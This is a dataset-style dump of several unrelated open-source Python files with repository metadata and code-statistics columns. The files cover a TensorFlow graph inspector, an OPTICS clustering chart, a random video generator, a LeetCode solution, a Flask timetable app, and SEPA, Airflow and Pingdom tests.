    print('Client not authenticated.') | 22.815789 | 46 | 0.734717 | 105 | 867 | 6 | 0.352381 | 0.095238 | 0.057143 | 0.050794 | 0.133333 | 0.133333 | 0.133333 | 0.133333 | 0 | 0 | 0 | 0.089961 | 0.11534 | 867 | 38 | 47 | 22.815789 | 0.731421 | 0 | 0 | 0.071429 | 0 | 0 | 0.107143 | 0.038018 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.107143 | 0 | 0.107143 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
e781cdbe0452060897cb4aa77bea0b37fe424f36 | 386 | py | Python | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 5 | 2019-01-17T03:08:41.000Z | 2021-10-31T17:02:11.000Z | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 11 | 2020-02-05T00:36:38.000Z | 2020-05-31T23:20:21.000Z | detection_tf/scripts/stuff/node_finder.py | hywel1994/SARosPerceptionKitti | 82c307facb5b39e47c510fbdb132962cebf09d2e | [
"MIT"
] | 4 | 2018-11-02T09:57:59.000Z | 2021-04-27T01:20:04.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 11 15:58:42 2018
@author: gustav
"""
import tensorflow as tf
NODE_OPS = ['Placeholder','Identity']
MODEL_FILE = '../models/ssd_mobilenet_v11_coco/frozen_inference_graph.pb'
gf = tf.GraphDef()
# Read the frozen graph (a binary GraphDef protobuf) and close the file promptly.
with open(MODEL_FILE, 'rb') as f:
    gf.ParseFromString(f.read())
# List name and op for every node whose op is in NODE_OPS,
# i.e. the graph's placeholders (inputs) and identity nodes (output aliases).
print([n.name + '=>' + n.op for n in gf.node if n.op in NODE_OPS])
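# The script prints entries such as 'image_tensor=>Placeholder' (illustrative).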
| 21.444444 | 73 | 0.681347 | 63 | 386 | 4.031746 | 0.793651 | 0.055118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047761 | 0.132124 | 386 | 17 | 74 | 22.705882 | 0.710448 | 0.248705 | 0 | 0 | 0 | 0 | 0.288256 | 0.206406 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78557afcf99f289bebfa26454aa02ac75ba1622 | 1,483 | py | Python | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | 7 | 2018-12-25T07:52:51.000Z | 2021-05-17T23:53:18.000Z | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | null | null | null | Clustering_Algorithms/create_chart.py | NikhilGupta1997/Data-Mining-Algorithms | 56c9acca3d4f62b72e0ec22e150421eaee2dc850 | [
"MIT"
] | null | null | null | import numpy as np
import sys
import matplotlib.pyplot as plt
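
# Usage (illustrative): python create_chart.py <minpts> <epsilon> <dataset-file>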
file = 'optics.txt'
minpts = int(sys.argv[1])
epsilon = float(sys.argv[2])
X = []
Y = []
cluster_inds = []
inds = []
noise = []
buff = []
counter = 0
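
# Each line of optics.txt is assumed to hold "<point-id> <reachability-distance>"
# in OPTICS cluster order; a negative distance marks undefined reachability.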
for i, line in enumerate(open(file).readlines()):
    counter += 1
    val = line.strip().split()
    idx = int(val[0])
    dist = float(val[1])
    if dist < 0.0:
        # Undefined reachability: cap the plotted value and treat the point
        # as a potential cluster boundary.
        dist = epsilon*epsilon
        buff.append(idx)
        if len(inds) > 100*minpts:
            # The accumulated run is large enough to count as a cluster;
            # the boundary points collected so far are treated as noise.
            cluster_inds.append(inds)
            noise.extend(buff)
            buff = []
            inds = []
    else:
        inds.append(idx)
    X.append(i)
    Y.append(dist)
noise.extend(buff)
noise.extend(inds)
# if len(inds) >= 0:
# cluster_inds.append(inds)
# cluster_inds.append(noise)
plt.figure()
plt.plot(X, Y)
plt.legend()
plt.xlabel('Point ID')
plt.ylabel('Reachability Distance')
plt.xticks([])
plt.title('Reachability Graph')
# plt.show()
dataset = sys.argv[3]
# Load the dataset coordinates as floats (split() yields strings).
data = np.array([val.strip().split() for val in open(dataset, 'r').readlines()], dtype=float)
if data.shape[1] == 2:
X = data[:, 0]
Y = data[:, 1]
color = {4: 'red', 1: 'blue', 2: 'green', 3: 'yellow', 0: 'black', 5: 'cyan', 6: 'magenta', }
plt.figure()
count = 0
for i, inds in enumerate(cluster_inds):
count += len(inds)
print(count, len(inds))
x_val = X[inds]
y_val = Y[inds]
plt.scatter(x_val, y_val, c=color[(i%6+1)], s=2, edgecolor=color[(i%6+1)])
# print noise
count += len(noise)
print(count, len(noise))
x_val = X[noise]
y_val = Y[noise]
plt.scatter(x_val, y_val, c='black', s=2)
plt.show() | 20.315068 | 94 | 0.631153 | 247 | 1,483 | 3.736842 | 0.323887 | 0.059588 | 0.055255 | 0.045504 | 0.04117 | 0.04117 | 0.04117 | 0 | 0 | 0 | 0 | 0.025122 | 0.167903 | 1,483 | 73 | 95 | 20.315068 | 0.722853 | 0.064059 | 0 | 0.135593 | 0 | 0 | 0.070137 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.050847 | 0 | 0.050847 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e787bcef0fe3c055b3e9f9ae08c31b576c247a87 | 2,376 | py | Python | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | 1 | 2020-11-07T17:15:27.000Z | 2020-11-07T17:15:27.000Z | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | null | null | null | random_video.py | enriqueav/the_random_video | 0dbeef2efbbad33351fd106b16095b4bb3ed8821 | [
"MIT"
] | null | null | null | import argparse
import time
from taor.randomvideo import random_video
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Create random videos. The --seed argument can be used to generate'
'consistent results. By default the name of the video will contain the epoch'
'time of generation, otherwise --image_path can be used to overwrite this.'
)
parser.add_argument("-s", "--seed",
help="Initialize numpy with a given seed. "
"Can be used to obtain consistent results.",
type=int)
parser.add_argument("-i", "--image_path",
help="Name of the file to create. "
"Epoch time is used as filename if -i is not specified.")
parser.add_argument("-d", "--debug",
help="Enter DEBUG mode.",
action="store_true")
parser.add_argument("-q", "--quantity",
help="Quantity of videos to generate. Default is 1."
"If --seed is set, the seed is used for the first video "
"and then 1 is added for each one of the following.",
type=int,
default=1)
parser.add_argument("-f", "--frames",
help="Quantity of video frames to generate. "
"Default of 24*60*2 == 2880, for a 2 minutes video at 24 FPS.",
type=int,
default=24*60*2)
args = parser.parse_args()
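
    # Example invocations (illustrative):
    #   python random_video.py --seed 42 --quantity 3
    #   python random_video.py -i my_video.avi -f 1440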
seed = args.seed
image_path = args.image_path
frames = args.frames
    for i in range(args.quantity):
        # Output name: --image_path if given, otherwise epoch time under ./results/.
        pre = args.image_path or "./results/" + str(int(time.time()))
        if args.seed:
            seed = args.seed + i
            image_path = pre + "_seed%d.avi" % seed
        elif args.quantity > 1:
            image_path = pre + "_number%d.avi" % i
        else:
            image_path = pre + ".avi"
random_video(file_name=image_path,
debug=args.debug,
seed=seed,
total_frames=frames)
| 44.830189 | 97 | 0.513889 | 278 | 2,376 | 4.276978 | 0.345324 | 0.083263 | 0.071489 | 0.027754 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0.12868 | 0 | 0.014354 | 0.384259 | 2,376 | 52 | 98 | 45.692308 | 0.79836 | 0 | 0 | 0.102041 | 0 | 0 | 0.322391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e787dc94ca4111ab33a1d29a9785aad5e480ebdf | 2,524 | py | Python | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_1743_restore_the_array_from_adjacent_pairs.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | # @l2g 1743 python3
# [1743] Restore the Array From Adjacent Pairs
# Difficulty: Medium
# https://leetcode.com/problems/restore-the-array-from-adjacent-pairs
#
# There is an integer array nums that consists of n unique elements,but you have forgotten it.However,
# you do remember every pair of adjacent elements in nums.
# You are given a 2D integer array adjacentPairs of size n - 1 where each adjacentPairs[i] = [ui,
# vi] indicates that the elements ui and vi are adjacent in nums.
# It is guaranteed that every adjacent pair of elements nums[i] and nums[i+1] will exist in adjacentPairs,
# either as [nums[i],nums[i+1]] or [nums[i+1],nums[i]].The pairs can appear in any order.
# Return the original array nums. If there are multiple solutions, return any of them.
#
# Example 1:
#
# Input: adjacentPairs = [[2,1],[3,4],[3,2]]
# Output: [1,2,3,4]
# Explanation: This array has all its adjacent pairs in adjacentPairs.
# Notice that adjacentPairs[i] may not be in left-to-right order.
#
# Example 2:
#
# Input: adjacentPairs = [[4,-2],[1,4],[-3,1]]
# Output: [-2,4,1,-3]
# Explanation: There can be negative numbers.
# Another solution is [-3,1,4,-2], which would also be accepted.
#
# Example 3:
#
# Input: adjacentPairs = [[100000,-100000]]
# Output: [100000,-100000]
#
#
# Constraints:
#
# nums.length == n
# adjacentPairs.length == n - 1
# adjacentPairs[i].length == 2
# 2 <= n <= 10^5
# -10^5 <= nums[i], ui, vi <= 10^5
# There exists some nums that has adjacentPairs as its pairs.
#
#
from collections import defaultdict
from typing import List
class Solution:
    def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:
        # Index each value to the pairs containing it, oriented so that
        # pair[0] is always the key.
        pair_counter = defaultdict(list)
        for pair in adjacentPairs:
            pair_counter[pair[0]].append(pair)
            pair_counter[pair[1]].append(pair[::-1])
        # Endpoints of the original array appear in exactly one pair.
        single_node = {node for node, value in pair_counter.items() if len(value) == 1}
        ans = []
        while len(single_node) != 0:
            start_node = single_node.pop()
            ans.append(start_node)
            link = pair_counter[start_node][0]
            pairs = pair_counter[link[1]]
            # Walk the chain; dropping the back-reference at each step leaves
            # the forward pair at index 0.
            while len(pairs) != 1:
                pair_counter[link[1]].remove(link[::-1])
                link = pairs[0]
                ans.append(link[0])
                pairs = pair_counter[link[1]]
            ans.append(link[1])
            single_node.remove(link[1])
        return ans
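
# Illustrative check (an addition, mirroring Example 1 above):
# Solution().restoreArray([[2, 1], [3, 4], [3, 2]]) returns [1, 2, 3, 4]
# or its reverse [4, 3, 2, 1]; either ordering is accepted.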
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_1743.py")])
| 30.409639 | 106 | 0.638669 | 372 | 2,524 | 4.268817 | 0.360215 | 0.055416 | 0.011335 | 0.030227 | 0.06801 | 0.06801 | 0 | 0 | 0 | 0 | 0 | 0.049642 | 0.225832 | 2,524 | 82 | 107 | 30.780488 | 0.76305 | 0.557845 | 0 | 0.076923 | 0 | 0 | 0.023321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e789b7eb8d4c8742185f24806004dfff92a4a404 | 1,449 | py | Python | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | timetable/timetable.py | Huy-Ngo/usth-timetable-2 | d9f653ee2cb138b075c7c630b6f8be08d959cb08 | [
"MIT"
] | null | null | null | import datetime
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for, session
)
from werkzeug.exceptions import abort
from timetable.student_auth import login_required
from . import db, updater
bp = Blueprint('timetable', __name__)
@bp.route('/', methods=['GET'])
def index():
user_id = session.get('user_id')
if user_id is None:
return render_template('timetable/index.html')
else:
response = db.get({
'table_name': 'student',
'id': user_id
})
user_calendar_id = response['response']['timetable_id']
        # Endpoints registered on a blueprint need the blueprint prefix in url_for.
        return redirect(url_for('timetable.r_calendar_view_now', calendar_id=user_calendar_id))
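

# A date-less URL such as /<calendar_id> redirects to today's schedule,
# e.g. /42/day/2020/1/15 (illustrative values).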
@bp.route('/<calendar_id>', methods=['GET'])
def r_calendar_view_now(calendar_id):
year = datetime.datetime.now().year
month = datetime.datetime.now().month
day = datetime.datetime.now().day
    view = 'day'  # TODO: replace with the user's preferred view, stored in a cookie/local storage
return redirect(url_for('timetable.r_list_schedule', timetable_id=calendar_id, view=view, year=year, month=month, day=day))
@bp.route('/<timetable_id>/<view>/<int:year>/<int:month>/<int:day>', methods=['GET'])
def r_list_schedule(timetable_id, view, year, month, day):
response = updater.get_event(timetable_id, view, year, month, day)
return render_template(
'timetable/timetable.html', events=response['response'],
calendar_id=timetable_id, year=year,
month=month, day=day, view=view
)
| 30.1875 | 124 | 0.73844 | 207 | 1,449 | 4.961353 | 0.309179 | 0.06816 | 0.037975 | 0.056475 | 0.185979 | 0.149951 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118012 | 1,449 | 47 | 125 | 30.829787 | 0.803599 | 0.065562 | 0 | 0 | 0 | 0 | 0.172337 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.142857 | 0 | 0.342857 | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78c94bb5cf3e2d928816be2ee0ebeb373a52cb8 | 4,912 | py | Python | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | 7 | 2015-01-02T19:31:14.000Z | 2021-03-22T17:30:23.000Z | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | 1 | 2015-03-06T08:34:59.000Z | 2015-03-06T08:34:59.000Z | apps/sepa/tests/integration.py | jfterpstra/onepercentclub-site | 43e8e01ac4d3d1ffdd5959ebd048ce95bb2dba0e | [
"BSD-3-Clause"
] | null | null | null | import os
import unittest
import decimal
from lxml import etree
from apps.sepa.sepa import SepaAccount, SepaDocument
from .base import SepaXMLTestMixin
class ExampleXMLTest(SepaXMLTestMixin, unittest.TestCase):
""" Attempt to test recreating an example XML file """
def setUp(self):
super(ExampleXMLTest, self).setUp()
# Read and validate example XML file
example_file = os.path.join(
self.directory, 'BvN-pain.001.001.03-example-message.xml'
)
self.example = etree.parse(example_file)
self.xmlschema.assertValid(self.example)
def test_generate_example(self):
""" Attempt to recreate example XML file. """
pass
class CalculateMoneyDonatedTests(SepaXMLTestMixin, unittest.TestCase):
"""
Generate and attempt to validate an XML file modelled after actual
transactions
"""
def setUp(self):
super(CalculateMoneyDonatedTests, self).setUp()
self.some_account = {
'name': '1%CLUB',
'iban': 'NL45RABO0132207044',
'bic': 'RABONL2U',
'id': 'A01'
}
self.another_account = {
'name': 'Nice Project',
'iban': 'NL13TEST0123456789',
'bic': 'TESTNL2A',
'id': 'P551'
}
self.third_account = {
'name': 'SHO',
'iban': 'NL28INGB0000000777',
'bic': 'INGBNL2A',
'id': 'P345'
}
self.payment1 = {
'amount': decimal.Decimal('50.00'),
'id': 'PAYMENT 1253675',
'remittance_info': 'some info'
}
self.payment2 = {
'amount': decimal.Decimal('25.00'),
'id': 'PAYMENT 234532',
'remittance_info': 'my info'
}
self.message_id = 'BATCH-1234'
payment_id = 'PAYMENTS TODAY'
# Create base for SEPA
sepa = SepaDocument(type='CT')
sepa.set_info(message_identification=self.message_id, payment_info_id=payment_id)
sepa.set_initiating_party(name=self.some_account['name'], id=self.some_account['id'])
some_account = SepaAccount(name=self.some_account['name'], iban=self.some_account['iban'],
bic=self.some_account['bic'])
sepa.set_debtor(some_account)
# Add a payment
another_account = SepaAccount(name=self.another_account['name'], iban=self.another_account['iban'],
bic=self.another_account['bic'])
sepa.add_credit_transfer(creditor=another_account, amount=self.payment1['amount'],
creditor_payment_id=self.payment1['id'],
remittance_information=self.payment1['remittance_info'])
# Add another payment
third_account = SepaAccount(name=self.third_account['name'], iban=self.third_account['iban'],
bic=self.third_account['bic'])
sepa.add_credit_transfer(creditor=third_account, creditor_payment_id=self.payment2['id'],
amount=self.payment2['amount'],
remittance_information=self.payment2['remittance_info'])
# Now lets get the xml for these payments
self.xml = sepa.as_xml()
def test_parse_xml(self):
""" Test parsing the generated XML """
# Still no errors? Lets check the xml.
tree = etree.XML(self.xml)
main = tree[0]
self.assertEqual(main.tag,
'{urn:iso:std:iso:20022:tech:xsd:pain.001.001.03}CstmrCdtTrfInitn'
)
header = main[0]
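        # Under GrpHdr the child order per the pain.001.001.03 schema (assuming no
        # optional Authstn element) is: [0] MsgId, [1] CreDtTm, [2] NbOfTxs, [3] CtrlSum.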
self.assertEqual(header.tag,
'{urn:iso:std:iso:20022:tech:xsd:pain.001.001.03}GrpHdr')
self.assertEqual(header[0].text, self.message_id)
# We should have two payments
self.assertEqual(header[2].text, "2")
        # Total amount should be the sum of the two payments, in euros
self.assertEqual(header[3].text, '75.00')
# Now lets check The second payment IBANs
second_payment = main[2]
namespaces = {
# Default
'pain': 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance'
}
self.assertEqual(
second_payment.find(
'pain:DbtrAcct/pain:Id/pain:IBAN', namespaces=namespaces
).text,
self.some_account['iban']
)
self.assertEqual(
second_payment.find(
'pain:CdtTrfTxInf/pain:CdtrAcct/pain:Id/pain:IBAN', namespaces=namespaces
).text,
self.third_account['iban']
)
def test_validate_xml(self):
""" Assert the XML is valid according to schema """
tree = etree.XML(self.xml)
self.xmlschema.assertValid(tree)
| 31.896104 | 107 | 0.578583 | 531 | 4,912 | 5.239171 | 0.306968 | 0.035586 | 0.037743 | 0.017254 | 0.155284 | 0.12509 | 0.099209 | 0.071172 | 0.040978 | 0.040978 | 0 | 0.042179 | 0.304967 | 4,912 | 153 | 108 | 32.104575 | 0.772701 | 0.112378 | 0 | 0.102041 | 0 | 0.030612 | 0.163687 | 0.065475 | 0 | 0 | 0 | 0 | 0.091837 | 1 | 0.05102 | false | 0.010204 | 0.061224 | 0 | 0.132653 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78d0b3c483bba3574b16e118dcb9461ba02bf95 | 2,992 | py | Python | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 1 | 2021-11-19T08:48:00.000Z | 2021-11-19T08:48:00.000Z | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 1 | 2022-01-06T23:11:02.000Z | 2022-01-06T23:11:02.000Z | freeflow/core/tests/dag.py | enorha/freeflow | 5b655ce616d408e566b0b900f96b24804dc49578 | [
"Apache-2.0"
] | 2 | 2021-11-19T08:51:35.000Z | 2021-12-24T14:39:00.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import freeflow.core.tests
from airflow import models as af_models
class DagTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dag_files = freeflow.core.tests.dag_files
def test_dag_integrity(self):
def check_valid_dag(dag):
"""
            Checks whether the Python file really contains a runnable DAG.
:param dag: python module (file)
:type dag: module
"""
self.assertTrue(
any(isinstance(var, af_models.DAG) for var in vars(dag).values()),
"File does not contains a DAG instance"
)
def check_single_dag_file(dag_class):
"""
            Checks that a single file defines at most one DAG.

            :param dag_class: list of DAG class instances
:type dag_class: list(DAG)
"""
self.assertTrue(
len(dag_class) <= 1,
"File should only contains a single DAG"
)
def check_dag_name(dag_class, filename):
"""
            Checks that the DAG name is snake case and matches the
            filename. If DAG versioning is needed, use <name>_v<number>.

            :param dag_class: list of DAG class instances
            :type dag_class: list(DAG)
            :param filename: the filename in which the DAG class(es) reside
:type filename: str
"""
dag_id = dag_class[0].dag_id
self.assertEqual(
dag_id.split('_v')[0],
filename,
"File name and DAG name should be the same"
)
self.assertTrue(
all(c.islower() or c.isdigit() or c == '_' for c in dag_id),
"DAG name should be all lower case"
)
def check_task_name_within_dag(task_class):
"""
            Checks that task names within a DAG are unique and lower case,
            to ensure clarity.

            :param task_class: list of task instances
:type task_class: list(BaseOperator)
"""
tasks = task_class
task_ids = []
for task in tasks:
task_ids.append(task.task_id)
self.assertTrue(
all(c.islower() or c.isdigit() or c == '_' or c == '-' for c in task.task_id),
"Task name should be all lower case"
)
self.assertEqual(
len(task_ids),
len(set(task_ids)),
"Task ID should not be duplicate"
)
for file in self._dag_files:
check_valid_dag(file['dag'])
check_single_dag_file(file['instance']['dags'])
check_dag_name(file['instance']['dags'], file['filename'])
check_task_name_within_dag(file['instance']['tasks'])
if __name__ == '__main__':
unittest.main()
| 31.829787 | 98 | 0.531417 | 357 | 2,992 | 4.271709 | 0.296919 | 0.057705 | 0.031475 | 0.029508 | 0.19082 | 0.152131 | 0.120656 | 0.120656 | 0.120656 | 0.120656 | 0 | 0.002153 | 0.379011 | 2,992 | 93 | 99 | 32.172043 | 0.818622 | 0.234291 | 0 | 0.12 | 0 | 0 | 0.136071 | 0 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.12 | false | 0 | 0.06 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e78d767af998e6e80008e8c991011efc8624eff7 | 1,429 | py | Python | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 4 | 2018-01-25T09:18:38.000Z | 2021-02-12T18:36:08.000Z | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 1 | 2018-12-04T18:42:06.000Z | 2021-05-25T14:03:32.000Z | pingdomexport/tests/load/test_checks_output.py | mattboston/pingdomexport | 1cd7acbf813abee0b9a7865b9cd4a1e166d55c37 | [
"MIT"
] | 3 | 2019-04-30T11:52:14.000Z | 2021-03-24T20:58:04.000Z | from pingdomexport.load import checks_output
class TestOutput:
def test_load(self, capsys):
checks_output.Output().load(
[
{
'hostname': 'www.a.com',
'use_legacy_notifications': True,
'lastresponsetime': 411,
'ipv6': False,
'type': 'http',
'name': 'A',
'resolution': 1,
'created': 1458372620,
'lasttesttime': 1459005934,
'status': 'up',
'id': 2057736
},
{
'lasterrortime': 1458938840,
'type': 'http',
'hostname': 'b.a.com',
'lastresponsetime': 827,
'created': 1458398619,
'lasttesttime': 1459005943,
'status': 'up',
'ipv6': False,
'use_legacy_notifications': True,
'resolution': 1,
'name': 'B',
'id': 2057910
}
]
)
out = capsys.readouterr()
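        # readouterr() returns an (out, err) pair; the CSV goes to stdout and
        # stderr is expected to stay empty.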
assert len(out) == 2
assert 'Id,Name,Created at,Status,Hostname,Type\r\n2057736,A,1458372620,up,www.a.com,http\r\n2057910,B,1458398619,up,b.a.com,http\r\n' == out[0]
assert '' == out[1]
| 34.853659 | 152 | 0.401679 | 111 | 1,429 | 5.108108 | 0.495496 | 0.028219 | 0.024691 | 0.091711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148396 | 0.476557 | 1,429 | 40 | 153 | 35.725 | 0.609626 | 0 | 0 | 0.263158 | 0 | 0.026316 | 0.253324 | 0.109867 | 0 | 0 | 0 | 0 | 0.078947 | 1 | 0.026316 | false | 0 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |